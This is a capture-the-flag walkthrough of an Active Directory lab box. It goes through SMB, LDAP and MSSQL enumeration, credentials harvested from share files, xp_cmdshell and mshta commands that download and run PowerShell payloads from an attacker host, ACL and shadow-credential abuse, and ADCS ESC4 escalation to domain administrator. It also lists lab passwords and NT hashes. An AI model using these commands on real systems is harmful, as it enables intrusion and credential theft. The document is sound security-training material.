rose / KxEPkKe6R8su

Enumeration

sudo nmap -sC -sV -oA 10.129.103.102 -vv 10.129.103.102 -Pn

Nmap Scan Results

  • Port 88 (Kerberos) being open suggests that the host is a domain controller.
  • Ports 389, 445 and 1433 show that LDAP, SMB and MSSQL services are running.

Hosts File

krb5.conf file

PORT 445

  • Let’s start our enumeration with port 445. I usually keep in mind that I need to compromise as many users as possible rather than looking for as many vulnerabilities as I can find. This helps me understand the network properly and find different exploitation paths.
  • First, check for anonymous share access:
nxc smb 10.129.103.102 -u '' -p '' --shares
  • No anonymous share access.
  • Now with the rose credentials:
nxc smb 10.129.103.102 -u 'rose' -p 'KxEPkKe6R8su' --shares

Share Access

smbclient.py 'rose:KxEPkKe6R8su@10.129.103.102'

Share Access

  • We found two interesting files.
  • We were not able to open them directly, but after converting the file to zip format and extracting the SharedStrings.xml file from it, we got the list of usernames and passwords below.

Username   Password            Valid
angela     0fwz7Q4mSpurIt99
oscar      86LxLBMgEWaKUnBG    true
kevin      Md9Wlq1E5bZnVDVo
sa         MSSQLP@ssw0rd!      true
rose       KxEPkKe6R8su        true
michael
ryan       WqSZAF6CysDQbGb3
sql_svc    WqSZAF6CysDQbGb3
ca_svc
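A SharedStrings.xml is the shared-string table of an OOXML spreadsheet, and an .xlsx is just a zip archive, so the cell strings can be listed without a spreadsheet application; this is also how a defender would sweep exported share contents for plaintext credentials. The following is an added example, not code from the original writeup: it assumes the files on the share were .xlsx archives, builds a constructed stand-in in memory and reads its shared-string table, including rich-text cells that split one string across several runs.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

# SpreadsheetML namespace; an .xlsx is a zip and its shared-string table
# lives at xl/sharedStrings.xml, one <si> element per distinct cell string.
SML = "http://schemas.openxmlformats.org/spreadsheetml/2006/main"


def shared_strings(xlsx_bytes: bytes) -> list[str]:
    """Return the shared-string table of an .xlsx in table order.

    A plain string is a single <t>; a rich-text string splits its runs
    into <r><t> children, so all <t> text under an <si> is concatenated.
    """
    with zipfile.ZipFile(io.BytesIO(xlsx_bytes)) as zf:
        member = next(n for n in zf.namelist()
                      if n.lower() == "xl/sharedstrings.xml")
        root = ET.fromstring(zf.read(member))
    return ["".join(t.text or "" for t in si.iter(f"{{{SML}}}t"))
            for si in root.findall(f"{{{SML}}}si")]


def build_sample_xlsx(strings_xml: str) -> bytes:
    """Constructed stand-in for the archive found on the share: a zip holding
    only xl/sharedStrings.xml, which is all the parser above needs."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("xl/sharedStrings.xml", strings_xml)
    return buf.getvalue()


# Constructed sample: a header row plus two records; the "Password" header
# is a rich-text cell and one secret carries preserved trailing whitespace.
SAMPLE_XML = (
    '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
    f'<sst xmlns="{SML}" count="6" uniqueCount="6">'
    '<si><t>Username</t></si>'
    '<si><r><t>Pass</t></r><r><rPr><b/></rPr><t>word</t></r></si>'
    '<si><t>svc_example</t></si>'
    '<si><t xml:space="preserve">Example-Secret-1 </t></si>'
    '<si><t>user_example</t></si>'
    '<si><t>Example-Secret-2</t></si>'
    '</sst>'
)
SAMPLE_XLSX = build_sample_xlsx(SAMPLE_XML)

if __name__ == "__main__":
    for idx, value in enumerate(shared_strings(SAMPLE_XLSX)):
        print(idx, repr(value))
```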

  • Let’s do Bloodhound collection.

Port 389

nxc ldap 10.129.103.102 -u oscar -p '86LxLBMgEWaKUnBG'  --bloodhound -c All -d sequel.htb --dns-server 10.129.103.102
  • BloodHound does not show an exploitable path at the moment.

Port 1433

mssqlclient.py 'sa:MSSQLP@ssw0rd!@10.129.103.102' 

sa login

EXEC xp_cmdshell 'powershell.exe -ExecutionPolicy Bypass -Command "(New-Object System.Net.WebClient).DownloadString(''http://10.10.14.126/sharp.ps1'') | IEX"'

Resource Development

./automation.sh
cme smb TargetIP -u 'Administrator' -H Hash or Password --local-auth -x "C:\Windows\System32\mshta.exe http://10.10.14.126/sharp.hta"

Command to run mshta directly:
mshta.exe http://10.10.14.126/sharp.hta

PowerShell command with URL encoding:
powershell%20%22IEX%20(New-Object%20System.Net.WebClient).DownloadString(%27http://10.10.14.126/sharp.ps1%27)%22

PowerShell command (without URL encoding):
(New-Object System.Net.WebClient).DownloadString('http://10.10.14.126/sharp.ps1') | IEX

Another PowerShell command for execution:
powershell "IEX (New-Object System.Net.WebClient).DownloadString('http://10.10.14.126/sharp.ps1')"

Initial access

rubeus tgtdeleg /nowrap
./rubeustoccache.py "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" ccache test

export KRB5CCNAME=test
klist
  • Login as user ryan
evil-winrm -i 10.129.103.102 -u ryan -p 'WqSZAF6CysDQbGb3'
(New-Object System.Net.WebClient).DownloadString('http://10.10.14.126/sharp.ps1') | IEX

  • ryan has WriteOwner on ca_svc, so we can make ourselves the object owner and then grant GenericAll.

./bloodyAD.py --host DC01 -u 'ryan' -d 'sequel.htb' -p 'WqSZAF6CysDQbGb3' set owner ca_svc ryan
./bloodyAD.py --host DC01 -u 'ryan' -d 'sequel.htb' -p 'WqSZAF6CysDQbGb3' add genericAll ca_svc ryan

./bloodyAD.py --host DC01 -u 'ryan' -d 'sequel.htb' -p 'WqSZAF6CysDQbGb3' set password ca_svc 'Password123!'
  • Shadow Credentials
./pywhisker.py -d "sequel.htb" -u "ryan" -p 'WqSZAF6CysDQbGb3' --target "ca_svc" --action "add" -e pfx
certipy cert -pfx ~/htb_season7/escape2/qSzNZADL.pfx -password OVh7jG3CAgsxeFqsEKPD -export -out ca_svc
certipy auth -pfx ca_svc -dc-ip 10.129.103.102 -username ca_svc -domain sequel.htb

Got hash for 'ca_svc@sequel.htb': aad3b435b51404eeaad3b435b51404ee:3b181b914e7a9d5508ea1e20bc2b7fce
Username        Password / NT hash                  Valid
angela          0fwz7Q4mSpurIt99
oscar           86LxLBMgEWaKUnBG                    true
kevin           Md9Wlq1E5bZnVDVo
sa              MSSQLP@ssw0rd!                      true
rose            KxEPkKe6R8su                        true
michael
ryan            WqSZAF6CysDQbGb3
sql_svc         WqSZAF6CysDQbGb3
ca_svc          3b181b914e7a9d5508ea1e20bc2b7fce
administrator   7a8d4e04986afa8ed4060f75e5a0b3ff
  • ESC4
certipy find -vulnerable -username 'ca_svc@sequel.htb' -hashes '3b181b914e7a9d5508ea1e20bc2b7fce' -dc-ip 10.129.103.102 -k -target DC01.sequel.htb -debug
certipy template -u ca_svc@sequel.htb -hashes '3b181b914e7a9d5508ea1e20bc2b7fce' -template DunderMifflinAuthentication -save-old -dc-ip 10.129.103.102

certipy req -username 'ca_svc@sequel.htb' -hashes '3b181b914e7a9d5508ea1e20bc2b7fce' -ca 'sequel-DC01-CA' -dc-ip 10.129.103.102 -template DunderMifflinAuthentication -upn 'administrator@sequel.htb' -target DC01.sequel.htb -dns 'dc01.sequel.htb'
certipy auth -pfx administrator_dc01.pfx -dc-ip 10.129.103.102

evil-winrm -i 10.129.103.102 -u administrator -H 7a8d4e04986afa8ed4060f75e5a0b3ff